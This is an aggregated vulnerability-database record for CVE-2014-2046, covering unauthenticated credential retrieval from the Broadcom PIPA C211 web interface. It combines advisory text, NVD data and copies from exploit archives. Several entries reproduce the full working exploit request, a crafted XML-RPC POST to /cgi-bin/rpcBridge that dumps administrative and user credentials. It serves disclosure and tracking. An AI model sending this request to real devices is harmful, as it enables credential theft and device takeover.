By sending a crafted POST request to the BROADCOM PIPA C211 web
interface it is possible to retrieve complete system configuration
including administrative credentials, SMTP community strings, FTP upload
credentials and all system user credentials:
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2046/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.
{"id": "SECURITYVULNS:DOC:30732", "bulletinFamily": "software", "title": "CVE-2014-2046 - Unauthenticated Credential And Configuration Retrieval In Broadcom Ltd PIPA C211", "description": "\r\n\r\nVulnerability title: Unauthenticated Credential And Configuration\r\nRetrieval In Broadcom Ltd PIPA C211\r\nCVE: CVE-2014-2046\r\nVendor: Broadcom Ltd\r\nProduct: PIPA C211\r\nAffected version: Soft Rev: SR1.1, HW Rev: PIPA C211 rev2\r\nFixed version: N/A\r\nReported by: Jerzy Kramarz\r\n\r\nDetails:\r\n\r\nBy sending a crafted POST request to the BROADCOM PIPA C211 web\r\ninterface it is possible to retrieve complete system configuration\r\nincluding administrative credentials, SMTP community strings, FTP upload\r\ncredentials and all system user credentials:\r\n \r\n\r\nFurther details at:\r\nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2046/\r\n\r\n\r\nCopyright:\r\nCopyright (c) Portcullis Computer Security Limited 2014, All rights\r\nreserved worldwide. Permission is hereby granted for the electronic\r\nredistribution of this information. It is not to be edited or altered in\r\nany way without the express written consent of Portcullis Computer\r\nSecurity Limited.\r\n\r\nDisclaimer:\r\nThe information herein contained may change without notice. Use of this\r\ninformation constitutes acceptance for use in an AS IS condition. There\r\nare NO warranties, implied or otherwise, with regard to this information\r\nor its use. Any use of this information is at the user's risk. In no\r\nevent shall the author/distributor (Portcullis Computer Security\r\nLimited) be held liable for any damages whatsoever arising out of or in\r\nconnection with the use or spread of this information.\r\n\r\n", "published": "2014-05-15T00:00:00", "modified": "2014-05-15T00:00:00", "cvss": {"score": 9.7, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30732", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2014-2046"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:52", "edition": 1, "viewCount": 17, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2018-08-31T11:10:52", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-2046"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:BC4E75C54CD5F049BB5FADAB8E928BC5"]}, {"type": "zdt", "idList": ["1337DAY-ID-22242"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:126601"]}, {"type": "seebug", "idList": ["SSV:86576"]}, {"type": "exploitdb", "idList": ["EDB-ID:33353"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13777"]}], "modified": "2018-08-31T11:10:52", "rev": 2}, "vulnersScore": 6.5}, "affectedSoftware": []}
{"cve": [{"lastseen": "2020-10-03T12:01:15", "description": "cgi-bin/rpcBridge in the web interface 1.1 on Broadcom Ltd PIPA C211 rev2 does not properly restrict access, which allows remote attackers to (1) obtain credentials and other sensitive information via a certain request to the config.getValuesHashExcludePaths method or (2) modify the firmware via unspecified vectors.", "edition": 3, "cvss3": {}, "published": "2014-05-14T00:55:00", "title": "CVE-2014-2046", "type": "cve", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.7, "vectorString": "AV:N/AC:L/Au:N/C:P/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 9.5, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2046"], "modified": "2014-05-14T18:55:00", "cpe": ["cpe:/a:broadcom:pipa_c211_web_interface:1.1", "cpe:/h:broadcom:pipa_c211:-"], "id": "CVE-2014-2046", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2046", "cvss": {"score": 9.7, "vector": "AV:N/AC:L/Au:N/C:P/I:C/A:C"}, "cpe23": ["cpe:2.3:h:broadcom:pipa_c211:-:rev2:*:*:*:*:*:*", "cpe:2.3:a:broadcom:pipa_c211_web_interface:1.1:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-03T19:00:15", "description": "Broadcom PIPA C211 - Sensitive Information Disclosure. CVE-2014-2046. Webapps exploit for hardware platform", "published": "2014-05-14T00:00:00", "type": "exploitdb", "title": "Broadcom PIPA C211 - Sensitive Information Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2046"], "modified": "2014-05-14T00:00:00", "id": "EDB-ID:33353", "href": "https://www.exploit-db.com/exploits/33353/", "sourceData": "Vulnerability title: Unauthenticated Credential And Configuration\r\nRetrieval In Broadcom Ltd PIPA C211\r\nCVE: CVE-2014-2046\r\nVendor: Broadcom Ltd\r\nProduct: PIPA C211\r\nAffected version: Soft Rev: SR1.1, HW Rev: PIPA C211 rev2\r\nFixed version: N/A\r\nReported by: Jerzy Kramarz\r\n\r\nDetails:\r\n\r\nBy sending the following request to the BROADCOM PIPA C211 web interface it is possible to retrieve complete system configuration including administrative credentials, SMTP community strings, FTP upload credentials and all other system user credentials:\r\n\r\nPOST /cgi-bin/rpcBridge HTTP/1.1\r\nHost: <IP>\r\nProxy-Connection: keep-alive\r\nContent-Length: 574\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.102 Safari/537.36\r\nOrigin: http://<IP>\r\nContent-Type: text/xml\r\nAccept: */*\r\nDNT: 1\r\nReferer: http://:<IP>/\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8,es;q=0.6,pl;q=0.4\r\n\r\n<methodCall><methodName>config.getValuesHashExcludePaths</methodName><params><param><value><string>sys</string></value></param><param><value><int>0</int></value></param><param><value><int>0</int></value></param><param><value><array><data><value><string>sys.applications.aptcodec.horizonnextgen.status</string></value><value><string>sys.applications.aptcodec.horizonnextgen.configuration</string></value></data></array></value></param></params></methodCall>\r\n\r\n \r\n\r\nFurther details at:\r\nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2046/\r\n\r\n\r\nCopyright:\r\nCopyright (c) Portcullis Computer Security Limited 2014, All rights\r\nreserved worldwide. Permission is hereby granted for the electronic\r\nredistribution of this information. It is not to be edited or altered in\r\nany way without the express written consent of Portcullis Computer\r\nSecurity Limited.\r\n\r\nDisclaimer:\r\nThe information herein contained may change without notice. Use of this\r\ninformation constitutes acceptance for use in an AS IS condition. There\r\nare NO warranties, implied or otherwise, with regard to this information\r\nor its use. Any use of this information is at the user's risk. In no\r\nevent shall the author/distributor (Portcullis Computer Security\r\nLimited) be held liable for any damages whatsoever arising out of or in\r\nconnection with the use or spread of this information.", "cvss": {"score": 9.7, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/33353/"}], "packetstorm": [{"lastseen": "2016-12-05T22:20:16", "description": "", "published": "2014-05-13T00:00:00", "type": "packetstorm", "title": "Broadcom PIPA C211 Information Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2046"], "modified": "2014-05-13T00:00:00", "id": "PACKETSTORM:126601", "href": "https://packetstormsecurity.com/files/126601/Broadcom-PIPA-C211-Information-Disclosure.html", "sourceData": "`Vulnerability title: Unauthenticated Credential And Configuration \nRetrieval In Broadcom Ltd PIPA C211 \nCVE: CVE-2014-2046 \nVendor: Broadcom Ltd \nProduct: PIPA C211 \nAffected version: Soft Rev: SR1.1, HW Rev: PIPA C211 rev2 \nFixed version: N/A \nReported by: Jerzy Kramarz \n \nDetails: \n \nBy sending the following request to the BROADCOM PIPA C211 web interface it is possible to retrieve complete system configuration including administrative credentials, SMTP community strings, FTP upload credentials and all other system user credentials: \n \nPOST /cgi-bin/rpcBridge HTTP/1.1 \nHost: <IP> \nProxy-Connection: keep-alive \nContent-Length: 574 \nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.102 Safari/537.36 \nOrigin: http://<IP> \nContent-Type: text/xml \nAccept: */* \nDNT: 1 \nReferer: http://:<IP>/ \nAccept-Encoding: gzip,deflate,sdch \nAccept-Language: en-US,en;q=0.8,es;q=0.6,pl;q=0.4 \n \n<methodCall><methodName>config.getValuesHashExcludePaths</methodName><params><param><value><string>sys</string></value></param><param><value><int>0</int></value></param><param><value><int>0</int></value></param><param><value><array><data><value><string>sys.applications.aptcodec.horizonnextgen.status</string></value><value><string>sys.applications.aptcodec.horizonnextgen.configuration</string></value></data></array></value></param></params></methodCall> \n \n \n \nFurther details at: \nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2046/ \n \n \nCopyright: \nCopyright (c) Portcullis Computer Security Limited 2014, All rights \nreserved worldwide. Permission is hereby granted for the electronic \nredistribution of this information. It is not to be edited or altered in \nany way without the express written consent of Portcullis Computer \nSecurity Limited. \n \nDisclaimer: \nThe information herein contained may change without notice. Use of this \ninformation constitutes acceptance for use in an AS IS condition. There \nare NO warranties, implied or otherwise, with regard to this information \nor its use. Any use of this information is at the user's risk. In no \nevent shall the author/distributor (Portcullis Computer Security \nLimited) be held liable for any damages whatsoever arising out of or in \nconnection with the use or spread of this information. \n \n \n`\n", "cvss": {"score": 9.7, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126601/broadcompipa-bypass.txt"}], "seebug": [{"lastseen": "2017-11-19T14:05:09", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Broadcom PIPA C211 - Sensitive Information Disclosure", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2046"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86576", "id": "SSV:86576", "sourceData": "\n Vulnerability title: Unauthenticated Credential And Configuration\r\nRetrieval In Broadcom Ltd PIPA C211\r\nCVE: CVE-2014-2046\r\nVendor: Broadcom Ltd\r\nProduct: PIPA C211\r\nAffected version: Soft Rev: SR1.1, HW Rev: PIPA C211 rev2\r\nFixed version: N/A\r\nReported by: Jerzy Kramarz\r\n\r\nDetails:\r\n\r\nBy sending the following request to the BROADCOM PIPA C211 web interface it is possible to retrieve complete system configuration including administrative credentials, SMTP community strings, FTP upload credentials and all other system user credentials:\r\n\r\nPOST /cgi-bin/rpcBridge HTTP/1.1\r\nHost: <IP>\r\nProxy-Connection: keep-alive\r\nContent-Length: 574\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.102 Safari/537.36\r\nOrigin: http://<IP>\r\nContent-Type: text/xml\r\nAccept: */*\r\nDNT: 1\r\nReferer: http://:<IP>/\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8,es;q=0.6,pl;q=0.4\r\n\r\n<methodCall><methodName>config.getValuesHashExcludePaths</methodName><params><param><value><string>sys</string></value></param><param><value><int>0</int></value></param><param><value><int>0</int></value></param><param><value><array><data><value><string>sys.applications.aptcodec.horizonnextgen.status</string></value><value><string>sys.applications.aptcodec.horizonnextgen.configuration</string></value></data></array></value></param></params></methodCall>\r\n\r\n \r\n\r\nFurther details at:\r\nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2046/\r\n\r\n\r\nCopyright:\r\nCopyright (c) Portcullis Computer Security Limited 2014, All rights\r\nreserved worldwide. Permission is hereby granted for the electronic\r\nredistribution of this information. It is not to be edited or altered in\r\nany way without the express written consent of Portcullis Computer\r\nSecurity Limited.\r\n\r\nDisclaimer:\r\nThe information herein contained may change without notice. Use of this\r\ninformation constitutes acceptance for use in an AS IS condition. There\r\nare NO warranties, implied or otherwise, with regard to this information\r\nor its use. Any use of this information is at the user's risk. In no\r\nevent shall the author/distributor (Portcullis Computer Security\r\nLimited) be held liable for any damages whatsoever arising out of or in\r\nconnection with the use or spread of this information.\n ", "cvss": {"score": 9.7, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-86576"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:55", "bulletinFamily": "software", "cvelist": ["CVE-2014-2046"], "description": "Device configuration may be accessed without authentication.", "edition": 1, "modified": "2014-05-15T00:00:00", "published": "2014-05-15T00:00:00", "id": "SECURITYVULNS:VULN:13777", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13777", "title": "BROADCOM PIPA C211 authentication bypass", "type": "securityvulns", "cvss": {"score": 9.7, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-03-28T07:17:53", "description": "Broadcom PIPA C211 suffers from credential and information disclosure vulnerabilities.", "edition": 2, "published": "2014-05-14T00:00:00", "type": "zdt", "title": "Broadcom PIPA C211 Information Disclosure Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2046"], "modified": "2014-05-14T00:00:00", "id": "1337DAY-ID-22242", "href": "https://0day.today/exploit/description/22242", "sourceData": "Vulnerability title: Unauthenticated Credential And Configuration\r\nRetrieval In Broadcom Ltd PIPA C211\r\nCVE: CVE-2014-2046\r\nVendor: Broadcom Ltd\r\nProduct: PIPA C211\r\nAffected version: Soft Rev: SR1.1, HW Rev: PIPA C211 rev2\r\nFixed version: N/A\r\nReported by: Jerzy Kramarz\r\n\r\nDetails:\r\n\r\nBy sending the following request to the BROADCOM PIPA C211 web interface it is possible to retrieve complete system configuration including administrative credentials, SMTP community strings, FTP upload credentials and all other system user credentials:\r\n\r\nPOST /cgi-bin/rpcBridge HTTP/1.1\r\nHost: <IP>\r\nProxy-Connection: keep-alive\r\nContent-Length: 574\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.102 Safari/537.36\r\nOrigin: http://<IP>\r\nContent-Type: text/xml\r\nAccept: */*\r\nDNT: 1\r\nReferer: http://:<IP>/\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8,es;q=0.6,pl;q=0.4\r\n\r\n<methodCall><methodName>config.getValuesHashExcludePaths</methodName><params><param><value><string>sys</string></value></param><param><value><int>0</int></value></param><param><value><int>0</int></value></param><param><value><array><data><value><string>sys.applications.aptcodec.horizonnextgen.status</string></value><value><string>sys.applications.aptcodec.horizonnextgen.configuration</string></value></data></array></value></param></params></methodCall>\r\n\r\n \r\n\r\nFurther details at:\r\nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2046/\n\n# 0day.today [2018-03-28] #", "cvss": {"score": 9.7, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22242"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:07", "description": "\nBroadcom PIPA C211 - Sensitive Information Disclosure", "edition": 1, "published": "2014-05-14T00:00:00", "title": "Broadcom PIPA C211 - Sensitive Information Disclosure", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2046"], "modified": "2014-05-14T00:00:00", "id": "EXPLOITPACK:BC4E75C54CD5F049BB5FADAB8E928BC5", "href": "", "sourceData": "Vulnerability title: Unauthenticated Credential And Configuration\nRetrieval In Broadcom Ltd PIPA C211\nCVE: CVE-2014-2046\nVendor: Broadcom Ltd\nProduct: PIPA C211\nAffected version: Soft Rev: SR1.1, HW Rev: PIPA C211 rev2\nFixed version: N/A\nReported by: Jerzy Kramarz\n\nDetails:\n\nBy sending the following request to the BROADCOM PIPA C211 web interface it is possible to retrieve complete system configuration including administrative credentials, SMTP community strings, FTP upload credentials and all other system user credentials:\n\nPOST /cgi-bin/rpcBridge HTTP/1.1\nHost: <IP>\nProxy-Connection: keep-alive\nContent-Length: 574\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.102 Safari/537.36\nOrigin: http://<IP>\nContent-Type: text/xml\nAccept: */*\nDNT: 1\nReferer: http://:<IP>/\nAccept-Encoding: gzip,deflate,sdch\nAccept-Language: en-US,en;q=0.8,es;q=0.6,pl;q=0.4\n\n<methodCall><methodName>config.getValuesHashExcludePaths</methodName><params><param><value><string>sys</string></value></param><param><value><int>0</int></value></param><param><value><int>0</int></value></param><param><value><array><data><value><string>sys.applications.aptcodec.horizonnextgen.status</string></value><value><string>sys.applications.aptcodec.horizonnextgen.configuration</string></value></data></array></value></param></params></methodCall>\n\n \n\nFurther details at:\nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2046/\n\n\nCopyright:\nCopyright (c) Portcullis Computer Security Limited 2014, All rights\nreserved worldwide. Permission is hereby granted for the electronic\nredistribution of this information. It is not to be edited or altered in\nany way without the express written consent of Portcullis Computer\nSecurity Limited.\n\nDisclaimer:\nThe information herein contained may change without notice. Use of this\ninformation constitutes acceptance for use in an AS IS condition. There\nare NO warranties, implied or otherwise, with regard to this information\nor its use. Any use of this information is at the user's risk. In no\nevent shall the author/distributor (Portcullis Computer Security\nLimited) be held liable for any damages whatsoever arising out of or in\nconnection with the use or spread of this information.", "cvss": {"score": 9.7, "vector": "AV:N/AC:L/Au:N/C:P/I:C/A:C"}}]}
